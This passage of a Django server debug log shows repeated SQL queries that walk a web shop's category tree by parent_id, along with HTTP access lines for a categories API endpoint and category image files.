"shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:26:16,069 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:26:16,071 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:26:16,074 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:26:16,076 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:26:16,080 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:26:16,082 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:26:16,084 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:26:16,086 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:26:16,088 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:26:16,091 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:26:16,093 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:26:16,096 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:26:16,098 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:26:16,101 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:26:16,103 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:26:16] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:26:16] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [19/Dec/2019 13:26:16] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 [19/Dec/2019 13:26:16] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 13:26:16] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [19/Dec/2019 13:26:16] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 13:26:16] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 13:26:21] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 13:26:23] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 13:26:26] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 13:26:29] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 13:26:29] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [19/Dec/2019 13:26:32] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 DEBUG 2019-12-19 13:26:42,781 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:26:42,787 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:26:42,791 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:26:42,794 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:26:42,797 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:26:42,799 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:26:42,801 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:26:42,804 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:26:42,806 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:26:42,809 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:26:42,812 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:26:42,814 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:26:42,816 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:26:42,819 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:26:42,822 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:26:42,825 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:26:42,827 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:26:42,829 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:26:42,831 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:26:42,835 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:26:42,838 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:26:42,840 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:26:42,842 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:26:42,845 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:26:42,847 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:26:42,851 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:26:42,853 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:26:42,855 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:26:42,858 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:26:42,860 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:26:42,864 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:26:42,866 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:26:42,868 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:26:42,870 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:26:42,873 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:26:42,877 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:26:42,880 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:26:42,882 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:26:42,885 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:26:42,887 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:26:42,890 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:26:42,893 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:26:42,895 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:26:42,898 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:26:42,901 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:26:42,903 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:26:42] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:26:43] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 DEBUG 2019-12-19 13:26:46,573 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:26:46,580 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:26:46,583 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-19 13:26:46,583 utils 